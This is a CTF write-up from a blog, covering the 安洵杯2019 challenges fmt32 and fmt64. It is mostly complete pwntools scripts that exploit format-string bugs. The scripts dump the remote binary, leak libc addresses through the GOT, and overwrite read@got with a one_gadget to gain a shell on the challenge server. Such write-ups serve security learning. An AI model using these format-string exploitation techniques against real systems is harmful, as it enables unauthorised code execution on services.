安洵杯2019
fmt32
fmt32: use the format-string bug to dump the binary, leak libc addresses through the GOT, then overwrite read's GOT entry.
from pwn import *
import plus_fmt as pft
# Range of the non-PIE fmt32 image that binary_get() dumps with repeated
# %s leaks: 0x2000 bytes from the fixed load address 0x08048000.
start_addr = 0x08048000
end_addr = start_addr + 0x2000  # 0x0804a000
# Challenge endpoint; every leak and the final GOT write go over this socket.
p = remote('47.108.135.45', 10001)
def leak(addr):
    """Leak the NUL-terminated bytes at `addr` from the fmt32 process.

    The payload is ``%10$s`` + the marker ``OOOO`` + the 4-byte address.
    With this binary the address placed after that 9-byte prefix is read
    as printf argument 10, so ``%10$s`` echoes what it points to, up to
    the first NUL.  (The 1-mod-4 position of the address matches the
    padding rule the write payload uses further down; the layout is
    specific to this target.)

    Returns the echoed bytes with the terminating NUL re-appended, so a
    caller can concatenate chunks and advance by ``len(data)``; the result
    is therefore never empty.
    """
    marker = 'OOOO'
    p.recvuntil('Please tell me:')
    p.sendline('%10$s' + marker + p32(addr))
    p.recvuntil('Repeater:')
    leaked = p.recvuntil(marker, True)
    return leaked + '\x00'
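def binary_get():
    """Dump start_addr..end_addr of the remote binary via leak().

    The whole range goes to 'pwnelf'; the chunks covering roughly the first
    0x500 bytes (presumably enough for the ELF header region) also go to
    'pwnelf2'.  leak() returns each chunk with its NUL included and never
    returns an empty string, so the cursor always advances.

    Both files hold raw leaked bytes, so they are opened in binary mode, and
    a ``with`` block guarantees they are flushed and closed even if the
    connection drops mid-dump (the original left them open on error).
    """
    cur_addr = start_addr
    head_limit = start_addr + 0x500
    with open('pwnelf', 'wb') as whole, open('pwnelf2', 'wb') as head:
        head_active = True
        while cur_addr <= end_addr:
            data = leak(cur_addr)
            log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
            cur_addr += len(data)
            if head_active:
                head.write(data)
                # Stop the short dump after the chunk that crosses 0x500.
                head_active = cur_addr <= head_limit
            whole.write(data)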
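# GOT of the non-PIE fmt32 binary.
puts_got = 0x804A01C
read_got = 0x804A010      # overwrite target: read@got -> one_gadget
printf_got = 0x804A014    # kept for reference, not used below
stderr_got = 0x804A040

# Stack layout every payload relies on (consistent with leak(), whose 9-byte
# prefix puts the address in printf argument 10): an address at input byte
# 9 + 4*k is argument 10 + k.
leak_arg = 10

# --- leak puts@libc through the GOT -----------------------------------------
p.recvuntil('Please tell me:')
p.sendline('%10$s' + 'OOOO' + p32(puts_got))
p.recvuntil('Repeater:')
# %s stops at the first NUL: read up to the marker and zero-extend rather
# than assuming exactly four bytes came back.
puts_so = u32(p.recvuntil('OOOO', drop=True).ljust(4, '\x00'))
log.success('puts ==> %#x' % puts_so)
libc_base = puts_so - 0x5f140
one = libc_base + 0x3a80c       # one_gadget; libc offsets as in the original
system = libc_base + 0x03a940   # unused fallback if the gadget constraint fails
log.success('libc_base ==> %#x' % libc_base)

# --- leak stderr (diagnostic only; nothing below depends on it) -------------
p.recvuntil('Please tell me:')
p.sendline('%10$s' + 'OOOO' + p32(stderr_got))
p.recvuntil('Repeater:')
stderr_so = u32(p.recvuntil('OOOO', drop=True).ljust(4, '\x00'))
log.success('one:%#x,stderr:%#x' % (one, stderr_so))

# --- overwrite read@got with two %hn writes ---------------------------------
# pwntools fmtstr_payload / plus_fmt were tried and abandoned; the payload
# is hand-built instead.
offset = 15   # argument slot of p32(read_got); read_got+2 is slot 16
# 'Repeater:' is 9 characters and the count starts at 9, i.e. that prefix is
# apparently emitted by the same printf call.  NOTE(review): confirm against
# the binary before reusing this elsewhere.
written = 9
lo = one & 0xffff
hi = (one >> 16) & 0xffff
log.success('high:%#x,low:%#x' % (hi, lo))
fmt = ''
# Counts are reduced mod 0x10000 so the second write still works when the
# high half is numerically smaller than the low half (a plain difference
# would go negative and produce a bogus '%-Nc').
for cnt, slot in (((lo - written) % 0x10000, offset),
                  ((hi - lo) % 0x10000, offset + 1)):
    if cnt:   # '%0c' would still print one char; skip the width when the count is already right
        fmt += '%{}c'.format(cnt)
    fmt += '%{}$hn'.format(slot)
# Pad to the exact length that puts the first address in slot `offset`
# (byte 9 + 4*(15-10) = 29).  Rounding the length up by 2..5 bytes only hits
# 29 when both counts have 4 or 5 digits; a shorter count would shift the
# addresses to an earlier slot and the %hn writes would miss.
fmt_len = 9 + 4 * (offset - leak_arg)
if len(fmt) > fmt_len:
    log.failure('format prefix is %d bytes, cannot reach slot %d' % (len(fmt), offset))
    exit(1)
fmt = fmt.ljust(fmt_len, 'a')
payload = fmt + p32(read_got) + p32(read_got + 2)
log.success('payload ==> %s,%d' % (repr(payload), len(payload)))
p.sendline(payload)
p.interactive()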
fmt64
leak 速度很慢，改用题目给的 `readelf -s fmt64` 输出来计算 ELF 中 read 的 GOT 地址并改写 GOT；pwntools 自带的 fmt payload 打不通，于是手写一个 fmt payload。
from pwn import *
import plus_fmt as pft
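# Challenge endpoint for the 64-bit variant.
p = remote('47.108.135.45', 20176)
# The argument slot of the input buffer was found by probing with a payload
# of the form '%9$ppppp' + 'a' * 8 (the probe was left commented out in the
# original); the payloads below rely on an address placed after an 8-byte
# prefix being read as printf argument 9.
# Range of the non-PIE fmt64 image that binary_get() can dump.
start_addr = 0x400000
end_addr = start_addr + 0xf00
# Module-level dump handle written by binary_get(); binary mode because it
# receives raw leaked bytes.  NOTE(review): it is opened (and the file
# truncated) even when the dump is not run, and only binary_get() closes it.
f = open('elf', 'wb')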
def leak(addr):
    """Leak the NUL-terminated bytes at `addr` from the fmt64 process.

    Sends ``%9$s`` + the marker ``OOOO`` + the 8-byte address; the 8-byte
    prefix puts the address in printf argument 9, so ``%9$s`` prints what
    it points to up to the first NUL.  Everything echoed after 'Repeater:'
    up to the marker is returned with the NUL re-appended, so callers can
    advance by ``len(data)`` and the result is never empty.
    """
    marker = 'OOOO'
    p.recvuntil('Please tell me:')
    p.sendline('%9$s' + marker + p64(addr))
    p.recvuntil('Repeater:')
    leaked = p.recvuntil(marker, True)
    return leaked + '\x00'
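def binary_get():
    """Dump start_addr..end_addr of the remote binary into the module-level file `f`.

    leak() returns each chunk with its NUL included and never returns an
    empty string, so the cursor always advances.  `f` is opened at module
    level; it is closed in a ``finally`` so that a connection dropped
    mid-dump still flushes what was already read (the original only closed
    it on the success path).
    """
    cur_addr = start_addr
    try:
        while cur_addr <= end_addr:
            data = leak(cur_addr)
            log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
            cur_addr += len(data)
            f.write(data)
    finally:
        f.close()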
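# binary_get()  # slow (one round-trip per NUL-terminated chunk); the GOT
#               # layout below was taken from the provided `readelf -s fmt64`.

# GOT of the non-PIE fmt64 binary.
got_base = 0x601018
puts_got = got_base
strlen_got = got_base + 8     # kept for reference, not used below
read_got = got_base + 6 * 8   # overwrite target: read@got -> one_gadget
stderr_got = 0x6010a0         # kept for reference, not used below

# Stack layout every payload relies on (consistent with leak(), whose 8-byte
# prefix puts the address in printf argument 9): the input buffer starts at
# argument 8 and each further 8 bytes is one more argument.
buf_arg = 8

# --- leak puts@libc through the GOT -----------------------------------------
p.recvuntil('Please tell me:')
p.sendline('%9$s' + 'OOOO' + p64(puts_got))
p.recvuntil('Repeater:')
# A userland pointer has six non-zero bytes and %s stops at the first NUL:
# read up to the marker and zero-extend rather than assuming exactly six.
puts_so = u64(p.recvuntil('OOOO', drop=True).ljust(8, '\x00'))
libc_base = puts_so - 0x06f690
one = libc_base + 0xf1147     # one_gadget; libc offsets as in the original
system = libc_base + 0x45390  # unused fallback if the gadget constraint fails
log.success('libc_base ==> %#x,one ==> %#x' % (libc_base, one))

# --- overwrite read@got byte by byte with %hhn ------------------------------
# pwntools fmtstr_payload / plus_fmt were tried and abandoned; the payload
# is hand-built instead.
offset = 17   # argument slot of the first address appended below
# 'Repeater:' is 9 characters and the count starts at 9, i.e. that prefix is
# apparently emitted by the same printf call.  NOTE(review): confirm against
# the binary before reusing this elsewhere.
written = 9
fmt = ''
for i in range(6):   # the six low bytes of the 8-byte gadget address
    target = (one >> (8 * i)) & 0xff
    cnt = (target - written) % 0x100
    if cnt:   # '%0c' would still print one char; skip the width when the count is already right
        fmt += '%{}c'.format(cnt)
    fmt += '%{}$hhn'.format(offset + i)
    written += cnt
# Six '%NNNc%NN$hhn' pieces are at most 72 bytes.  Pad to exactly the length
# that puts the first address in slot `offset` rather than rounding up to the
# next multiple of 8: with the rounding, a prefix of 60..63 bytes ends up at
# 64 and one of exactly 72 at 80, so the %hhn slots would point past or
# before the addresses depending on how many digits the counts have.
fmt_len = 8 * (offset - buf_arg)   # 72
if len(fmt) > fmt_len:
    log.failure('format prefix is %d bytes, cannot reach slot %d' % (len(fmt), offset))
    exit(1)
fmt = fmt.ljust(fmt_len, 'a')
payload = fmt + ''.join(p64(read_got + i) for i in range(6))
log.success('payload ==> %s,%d' % (repr(payload), len(payload)))
p.send(payload)   # no trailing newline: keep the length exact
p.interactive()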
文章标题:安洵杯2019
本文作者:枫云李
发布时间:2019-11-30, 00:00:00
最后更新:2020-04-11, 01:24:25